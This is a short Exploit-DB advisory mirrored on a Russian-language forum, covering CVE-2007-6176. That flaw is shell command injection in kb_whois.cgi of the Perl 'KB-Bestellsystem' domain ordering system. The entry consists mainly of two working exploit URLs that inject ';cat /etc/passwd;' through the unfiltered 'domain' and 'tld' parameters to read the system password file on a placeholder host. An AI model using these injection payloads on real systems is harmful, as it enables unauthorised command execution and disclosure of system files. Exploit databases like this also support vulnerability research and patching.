- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4647
- Проверка EDB
-
- Пройдено
- Автор
- ZERO X
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- cve-2007-6176
- Дата публикации
- 2007-11-22
Код:
"KB-Bestellsystem" is a domain order system written in Perl.
The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters.
The following examples will show you the /etc/passwd file:
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif=
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif=
<< Greetz Zero X >>
# milw0rm.com [2007-11-22]- Источник
- www.exploit-db.com
